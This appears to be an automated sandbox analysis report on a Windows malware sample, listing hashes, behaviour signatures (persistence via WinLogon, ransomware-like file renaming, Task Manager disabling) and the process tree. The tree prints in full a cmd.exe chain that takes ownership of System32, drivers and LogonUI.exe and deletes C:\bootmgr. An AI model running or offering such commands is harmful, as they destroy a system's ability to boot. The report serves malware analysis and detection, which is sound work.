Analysis
-
max time kernel
165s -
max time network
173s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2023 16:06
Behavioral task
behavioral1
Sample
04df8dd30da8b5853f48cc1ac9b695a8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
04df8dd30da8b5853f48cc1ac9b695a8.exe
Resource
win10v2004-20231215-en
General
-
Target
04df8dd30da8b5853f48cc1ac9b695a8.exe
-
Size
6.1MB
-
MD5
04df8dd30da8b5853f48cc1ac9b695a8
-
SHA1
4c02262c2fea0e99277a99dcbe28a9c370b87c39
-
SHA256
78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201
-
SHA512
3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e
-
SSDEEP
3072:jnsbblTAByHNgb0nbYlwKsw962CpJid72gqV/6c4LNobbamucc3OD4iEDzyEaE0u:jnsq7hQplBdJ7bP4L8rVE
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" 04df8dd30da8b5853f48cc1ac9b695a8.exe -
Renames multiple (372) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 7 IoCs
pid Process 5004 takeown.exe 3208 takeown.exe 3312 icacls.exe 2656 takeown.exe 548 icacls.exe 2520 takeown.exe 3948 icacls.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation 04df8dd30da8b5853f48cc1ac9b695a8.exe -
Modifies file permissions 1 TTPs 7 IoCs
pid Process 2520 takeown.exe 3948 icacls.exe 5004 takeown.exe 3208 takeown.exe 3312 icacls.exe 2656 takeown.exe 548 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 876 04df8dd30da8b5853f48cc1ac9b695a8.exe Token: SeDebugPrivilege 876 04df8dd30da8b5853f48cc1ac9b695a8.exe Token: SeTakeOwnershipPrivilege 3208 takeown.exe Token: SeTakeOwnershipPrivilege 2656 takeown.exe Token: SeTakeOwnershipPrivilege 2520 takeown.exe Token: SeTakeOwnershipPrivilege 5004 takeown.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 876 wrote to memory of 1272 876 04df8dd30da8b5853f48cc1ac9b695a8.exe 91 PID 876 wrote to memory of 1272 876 04df8dd30da8b5853f48cc1ac9b695a8.exe 91 PID 1272 wrote to memory of 3208 1272 cmd.exe 93 PID 1272 wrote to memory of 3208 1272 cmd.exe 93 PID 1272 wrote to memory of 3312 1272 cmd.exe 94 PID 1272 wrote to memory of 3312 1272 cmd.exe 94 PID 1272 wrote to memory of 2656 1272 cmd.exe 97 PID 1272 wrote to memory of 2656 1272 cmd.exe 97 PID 1272 wrote to memory of 548 1272 cmd.exe 98 PID 1272 wrote to memory of 548 1272 cmd.exe 98 PID 1272 wrote to memory of 2520 1272 cmd.exe 99 PID 1272 wrote to memory of 2520 1272 cmd.exe 99 PID 1272 wrote to memory of 3948 1272 cmd.exe 100 PID 1272 wrote to memory of 3948 1272 cmd.exe 100 PID 1272 wrote to memory of 5004 1272 cmd.exe 101 PID 1272 wrote to memory of 5004 1272 cmd.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe"C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe"1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3208
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3312
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:548
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3948
-
-
C:\Windows\system32\takeown.exetakeown /f C:\bootmgr3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16B
MD579bb29efb8fb96f11016ce4754e80b6b
SHA19ed8d422a9926e01c03bff38c34beadf2522ca7c
SHA2565de2e6ca20d8f3b3a7683cce544979246d9eb2f27a94c184d9a50775ebb7ca02
SHA512d742556f9751c6f73dcc2d80fb5e8643fb1613ea4a67cf923c52c310864b6dde95a3a8e4d02c8309c8778e9cab75d528b52e30988a6eedbadbeb61c0ba76df51
-
Filesize
340KB
MD57cfd879613a87418d31354bd52635e54
SHA1992bf80de1bb9c3e81e6dd960400fee95fecdfa2
SHA256e3056a7d74e9afab6061646a54138084664915265e4aca3c6b02ee184fd61fe5
SHA512680902581c6a77808a70467429ed64eb43d4ca9078c4479b01c3c1f03ecf63dd40db903fdc9ed367ecc83e9f627a83184b1e941f6b35976ff0329cbb6c43907d